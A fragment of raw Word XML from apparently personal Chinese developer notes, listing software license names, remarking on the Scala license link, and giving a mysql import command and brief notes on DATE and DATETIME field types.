        <w:t>SendBird VideoChat SDK License</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CCDB8C" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eclipse Public License -v 1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0F4521" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>optimizer, Version 1.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DBD077" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>resGuard, Version 1.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D93806" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>The WebRTC Software License and Addition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6647335E" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PayPal SDK License</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548A7A49" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SavedStateFlow License</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8213E4" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tocea Software Licence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C41F5B6" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eclipse Public License</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297BFF77" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>The Do-No-Evil License, Version 1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1504427D" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Stream License</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F77691C" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Symas License</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03083DC1" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Stytch License</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E35BBC6" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:t>Stringflow License</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7190A6" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Storifyme License</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C6E223" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SourceClear Proprietary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DE042D" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Spren License</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1552F350" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SDK licence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4D0A0C" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SPARKSEE Graph Database license, Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68873ADC" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>木兰宽松许可证</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E9F539" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78714360" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C32B881" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30DD05CE" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A347A9E" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A50BD84" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46833AAF" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="336F1B39" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="487436C5" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D65EDF9" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A672B18" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22ED160E" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C73E4DC" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="051FBA98" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D4617A3" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75058774" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="702A52AA" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22B248C2" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="260" w:after="260" w:line="413" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>有趣的案例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9DFDD7" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Scala License</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是什么，然后看到这是个</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作者，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441FDFE5" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="008941B7">
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/scala/scala/blob/2.13.x/LICENSE</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向的是</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apache 2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>license</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DD3647" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6277EC5A" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DB31921" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AD7D80F" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5588A5D1" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="764E321E" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30E59805" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7305B9AD" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB11516" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D82D4EB" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F2F12BD" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BEEAE8F" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EAB6BE1" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21567EF7" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E51969C" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B0BA015" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3809356C" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54534A5F" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A590C0F" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6530645A" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C86C6C9" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2984CAB0" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66608838" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2056B4B9" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="395FD1A8" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BFAF991" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5644F9DB" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3219A8" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B521C02" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AFBBBF8" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7135C989" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E43D2A2" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47EB43A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="278F6836" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc159779523"/>
      <w:r>
        <w:t>sql及数据库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="439DB3D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1408F8E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc159779524"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接数据库并导入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="374084F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、端口、用户名等信息导入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4138C3AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mysql -uroot -P23306 -h192.168.3.199 -p1qaz@WSX -C syj_test &lt; 2023_01_22_cwe.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B7B18B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE14C38" w14:textId="77777777" w:rsidR="00077132" w:rsidRDefault="00077132" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E89038D" w14:textId="7ED9B5AA" w:rsidR="00077132" w:rsidRDefault="00077132" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc159779525"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用字段类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="76E3E38C" w14:textId="77777777" w:rsidR="00077132" w:rsidRDefault="00077132" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75AF32C9" w14:textId="3E500C54" w:rsidR="00077132" w:rsidRDefault="00644881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DATE  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只表示日期不表示时间，</w:t>
      </w:r>
      <w:r w:rsidR="00470F3D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidR="00470F3D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00470F3D">
        <w:t>2017-03-03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0C9A98" w14:textId="6F9E1971" w:rsidR="00470F3D" w:rsidRDefault="00470F3D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ATETIME  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标识具体到时分秒的时间和日期，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>2017-03-03</w:t>
      </w:r>
      <w:r w:rsidR="00C16F98">
        <w:t xml:space="preserve"> 18:30:22</w:t>
      </w:r>
